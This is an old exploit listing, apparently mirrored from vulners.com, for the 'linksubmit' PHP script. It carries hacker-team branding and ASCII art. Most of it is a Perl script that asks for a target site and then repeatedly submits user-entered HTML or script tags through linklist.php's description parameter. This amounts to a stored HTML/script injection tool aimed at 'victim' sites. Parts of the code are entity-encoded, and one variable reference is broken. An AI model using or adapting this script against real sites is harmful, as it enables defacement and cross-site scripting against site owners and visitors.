linksubmit <= All version Html Tag Injector in index.php

2006-04-0200:00:00

vulners.com

Vendor : linksubmit
Version : All Version
www : http://www.phpselect.com
AUTHOR : s3rv3r_hack3r
you can submit html tag's in $description (linksubmit.php)

Exploit :
#!/usr/bin/perl

Exploit by s3rv3r_hack3r

Special Thanx : hessamx , f0rk ,sattar.li , stanic, mfox,blood moon and…

######################################################

_ _ __

/ | \_ | | _________________

#/ ~ \__ \ / \| |/ // __ \ __ \ / #
#\ Y // __ \\ \___| <\ ___/| | \// / #

\| /( )\_ >|_ \\_ >| /___ \

\/ \/ \/ \/ \/ \/

Iran Hackerz Security Team

WebSite: www.hackerz.ir

######################################################

Name : linksubmit

Site : http://www.phpselect.com/

######################################################
#you can use iframe,script and all html tags
#bug in linklist.php !!
#www.victim.com/linklist
use LWP::Simple;

print "-------------------------------------------\n";
print "= Iran hacekerz security team =\n";
print "= By s3rv3r_hack3r - www.hackerz.ir =\n";
print "-------------------------------------------\n\n";

  print &quot;Target &gt;http://&quot;;
  chomp&#40;$targ = &lt;STDIN&gt;&#41;;
  print &quot;your web site name &gt;&quot;;
  chomp&#40;$wwwname= &lt;STDIN&gt;&#41;;
  print &quot;your web site url &gt;&quot;;
  chomp&#40;$wsurl= &lt;STDIN&gt;&#41;;
  print &quot;your email &gt;&quot;;
  chomp&#40;$mail= &lt;STDIN&gt;&#41;;

$con=get("http://".$targ."/linklist.php") || die "[-]Cannot connect to Host";
while ()
{
print "Html code\$";
chomp($comd=<STDIN>);
$commd=get("http://".$targ."/linklist.php?wsname=".$wwwname."&wsurl=".url."&email=".$mail."&description=".$comd)
}

JSON

linksubmit &lt;= All version Html Tag Injector in index.php